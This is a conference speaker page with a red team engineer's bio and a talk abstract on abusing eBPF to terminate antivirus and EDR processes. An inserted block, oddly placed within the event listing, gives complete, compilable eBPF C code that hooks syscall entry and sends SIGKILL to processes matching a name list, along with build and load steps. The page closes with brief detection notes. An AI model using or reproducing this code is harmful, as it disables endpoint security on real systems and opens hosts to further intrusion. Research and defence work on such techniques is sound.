Donato Onofri

Senior Red Team Engineer
CrowdStrike
Donato Onofri is a seasoned Red Team Engineer whose research covers state-of-the-art offensive techniques, malware analysis, and system internals. He is also co-author of the book Attacking and Exploiting Modern Web Applications.

Speaker sessions

eBPF Warfare: Subverting Security Solutions Through Kernel-Space Manipulation

Extended Berkeley Packet Filter (eBPF) has revolutionized Linux kernel observability and networking, but its powerful capabilities can be weaponized against security solutions. This talk explores how attackers can leverage eBPF primitives to identify, track, and terminate security processes, including antivirus solutions and EDR tools.

We'll demonstrate how eBPF's kernel-level access can be exploited to create sophisticated process-killing mechanisms that operate below traditional security controls. Through practical examples, we'll showcase process-termination techniques that bypass common protection mechanisms.

Key topics include:
  • Essential eBPF hooks for process manipulation
  • Quick-win termination techniques
  • Live demo of security tool subversion
  • Critical defensive considerations

The presentation concludes with defensive considerations, detection methods, and mitigation strategies for security vendors and defenders. This research highlights the growing need for security solutions to adapt to kernel-level threats and implement stronger self-protection mechanisms.
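As an added illustration of the kernel primitive behind this kind of termination technique (example code written for this page, not material from the talk, whose exact hooks are not described here): the documented `bpf_send_signal()` helper (Linux 5.3+) lets a tracing program send a signal to the task that triggered the hook. The program below attaches to the `raw_syscalls/sys_enter` tracepoint, reads the current task's comm, and sends SIGKILL when it matches a target list. The target names (`example-edr` and the others) are constructed placeholders, not real product names. The source is written so that one file builds as a BPF object with `clang -O2 -g -target bpf -c ebpf_sigkill_demo.c` (load it with a libbpf loader or `bpftool prog loadall`; loading needs CAP_BPF or CAP_SYS_ADMIN) and also compiles on the host, where the comm-matching logic can be unit-tested without touching the kernel.

```c
/* ebpf_sigkill_demo.c -- added example, not the talk's code.
 *
 * BPF build:  clang -O2 -g -target bpf -c ebpf_sigkill_demo.c -o ebpf_sigkill_demo.o
 * Host build (only the matching logic is compiled):  cc -Wall -c ebpf_sigkill_demo.c
 */

#define TASK_COMM_LEN 16   /* kernel limit: 15 characters plus NUL */
#define SIGKILL 9

/* Constructed placeholder names. A real list would hold the comm values of the
 * agents being targeted; note that comm is truncated to 15 characters, so a
 * long binary name must be listed in its truncated form. */
static const char TARGETS[][TASK_COMM_LEN] = {
	"example-edr",
	"example-av",
	"example-sensor",
};
#define NTARGETS (sizeof(TARGETS) / sizeof(TARGETS[0]))

/* Return 1 if the NUL-terminated comm equals one of TARGETS, else 0.
 * Index-based, bounded loops so the BPF verifier accepts the same code. */
static int comm_matches(const char *comm)
{
	for (unsigned i = 0; i < NTARGETS; i++) {
		int same = 1;
		for (unsigned j = 0; j < TASK_COMM_LEN; j++) {
			if (comm[j] != TARGETS[i][j]) {
				same = 0;
				break;
			}
			if (comm[j] == '\0')   /* both strings ended together */
				break;
		}
		if (same)
			return 1;
	}
	return 0;
}

#ifdef __bpf__
/* Helper calls by helper ID, the same trick libbpf's bpf_helper_defs.h uses,
 * so no libbpf headers are required: 16 = get_current_comm, 109 = send_signal. */
static long (*bpf_get_current_comm)(void *buf, unsigned int size) = (void *)16;
static long (*bpf_send_signal)(unsigned int sig) = (void *)109;

/* Runs at every system-call entry, in the context of the calling task, which
 * is exactly the context bpf_send_signal() requires. The signal is queued for
 * the current task and delivered when it returns to user space. */
__attribute__((section("tracepoint/raw_syscalls/sys_enter"), used))
int kill_target_on_syscall(void *ctx)
{
	char comm[TASK_COMM_LEN] = {0};

	(void)ctx;
	if (bpf_get_current_comm(comm, sizeof(comm)) != 0)
		return 0;
	if (comm_matches(comm))
		bpf_send_signal(SIGKILL);
	return 0;
}

char LICENSE[] __attribute__((section("license"), used)) = "GPL";
#endif
```

Two practitioner points this makes concrete. First, `bpf_send_signal()` only acts on the current task, so the attacker has to choose a hook the target process will itself hit: a high-frequency syscall tracepoint is the quick win against a running agent, and `sched/sched_process_exec` catches it on restart. Second, the program is not invisible: `bpftool prog show` lists it, `bpftool prog dump xlated id N` shows the `call bpf_send_signal` instruction, and the load goes through the `bpf()` syscall, which is auditable and gated for unprivileged users by `kernel.unprivileged_bpf_disabled`. That is where the detection and self-protection side of the problem starts.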
  • 15:20
  • Tue
  • 02 Dec
Stage: Briefings 1
Sessions Type: Presentation